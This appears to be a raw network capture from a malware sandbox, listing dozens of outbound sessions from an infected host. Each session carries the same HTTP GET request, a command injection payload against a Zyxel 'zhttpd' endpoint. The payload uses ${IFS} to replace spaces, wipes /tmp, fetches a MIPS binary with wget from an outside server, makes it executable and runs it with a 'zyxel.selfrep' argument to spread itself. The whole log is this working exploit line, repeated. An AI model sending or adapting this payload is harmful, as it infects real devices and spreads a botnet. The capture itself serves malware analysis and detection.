                              Mar 31, 2024 08:41:15.683172941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3033192.168.2.133600636.12.58.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683183908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3034192.168.2.1360862125.123.127.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683223963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3035192.168.2.133564631.186.209.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683254004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3036192.168.2.133712418.143.240.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683276892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3037192.168.2.134413432.147.53.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683317900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3038192.168.2.1343434143.191.106.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683353901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3039192.168.2.136017634.163.11.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683406115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3040192.168.2.1357544168.179.180.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683451891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3041192.168.2.1352210124.96.128.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683478117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3042192.168.2.135437247.79.2.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683543921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3043192.168.2.1360524196.45.94.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683572054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3044192.168.2.135686653.111.30.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683609009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3045192.168.2.1345308108.232.131.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683662891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3046192.168.2.1349950192.49.240.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683708906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3047192.168.2.13380364.219.65.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683762074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3048192.168.2.1354248182.185.124.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683818102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3049192.168.2.134460499.12.146.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683865070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3050192.168.2.1341370221.228.178.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683891058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3051192.168.2.135192612.106.35.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683929920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3052192.168.2.1338122109.44.73.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.683959007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3053192.168.2.1339880154.158.215.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684031010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3054192.168.2.1354406220.11.148.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684067965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3055192.168.2.1342272163.253.13.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684119940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3056192.168.2.134151686.147.13.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684159994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3057192.168.2.1343298202.124.107.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684226990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3058192.168.2.1360080143.41.243.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684273005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3059192.168.2.1355058179.210.117.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684310913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3060192.168.2.133513818.37.179.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684341908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3061192.168.2.134231870.37.63.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684400082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3062192.168.2.135204818.134.67.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684444904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3063192.168.2.135462679.28.75.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684475899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3064192.168.2.1357044103.141.244.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684530020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3065192.168.2.1358028172.122.243.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684588909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3066192.168.2.1338400120.143.236.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684638977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3067192.168.2.1349180169.86.232.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684689045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3068192.168.2.1334918126.126.62.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684725046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3069192.168.2.13508288.192.147.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684788942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3070192.168.2.1338780156.155.251.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684832096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3071192.168.2.135484890.33.214.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684854031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3072192.168.2.1357516120.57.154.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684886932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3073192.168.2.1357744154.122.99.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684961081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3074192.168.2.135395275.51.4.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.684993982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3075192.168.2.1334448165.168.36.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685051918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3076192.168.2.1344680132.202.9.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685081959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3077192.168.2.1356510123.63.218.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685112953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3078192.168.2.133707441.77.22.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685159922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3079192.168.2.135736299.150.243.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685225010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3080192.168.2.1360540116.41.99.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685271978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3081192.168.2.135295639.117.13.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685302019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3082192.168.2.1353420186.124.106.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685349941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3083192.168.2.1350592130.136.147.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685375929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3084192.168.2.1348420199.99.104.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685398102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3085192.168.2.1360760109.154.75.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685441971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3086192.168.2.1345380122.213.143.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685478926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3087192.168.2.1345818184.51.159.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685537100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3088192.168.2.13561309.26.55.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685559988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3089192.168.2.135633097.148.103.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685616970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3090192.168.2.1356180171.96.202.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685662985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3091192.168.2.1339332154.73.228.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685699940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3092192.168.2.1357408196.222.77.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685740948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3093192.168.2.1358182107.11.75.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685767889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3094192.168.2.1343106117.181.120.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685815096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3095192.168.2.1354530110.158.136.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685841084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3096192.168.2.135233265.157.93.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685885906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3097192.168.2.1348816112.106.157.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685911894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3098192.168.2.1349628203.205.186.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685960054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3099192.168.2.1360658153.27.10.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.685985088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3100192.168.2.135945239.208.68.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686027050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3101192.168.2.134285664.9.11.192443
                              TimestampBytes transferredDirectionData
